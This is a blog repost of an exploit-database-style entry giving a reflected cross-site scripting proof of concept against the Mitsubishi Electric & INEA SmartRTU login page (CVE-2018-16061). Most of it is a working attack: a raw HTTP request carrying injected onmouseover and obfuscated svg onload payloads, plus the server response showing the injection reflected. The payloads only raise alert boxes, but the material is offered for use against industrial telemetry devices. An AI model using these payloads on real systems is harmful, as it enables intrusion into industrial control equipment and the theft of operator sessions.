Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863550878

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)
# Date: 2021-17-10
# Exploit Author: Hamit CİBO
# Vendor Homepage: https://www.inea.si
# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
# Version: ME RTU
# Tested on: Windows
# CVE : CVE-2018-16061


# PoC
# Request

POST
/login.php/srdzz'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%
3btop%3a0%3bleft%3a0%3b'bsmy8 HTTP/1.1
Host: **.**.**.***
Content-Length: 132
Cache-Control: max-age=0
Origin: http://**.**.**.***
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/68.0.3440.84
Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://**.**.**.***sss/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=el8pvccq5747u4qj9koio950l7
Connection: close

submitted=1&username=--
%3E%27%22%2F%3E%3C%2FsCript%3E%3CsvG+x%3D%22%3E%22+onload%3D%28co%5Cu006efirm%29%60%60&passw
ord=&Submit=Login

# Response

HTTP/1.1 200 OK
Date: Wed, 08 Aug 2018 08:14:25 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4
Vary: Accept-Encoding
Content-Length: 3573
Connection: close
Content-Type: text/html

<div id='fg_membersite' class='login_form'>
<form id='login' name='login'
action='/login.php/srdzz'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'bsmy8'
method='post' accept-charset='UTF-8'>


Reference :

https://drive.google.com/file/d/1DEZQqfpIgcflY2cF6O0y7vtlWYe8Wjjv/view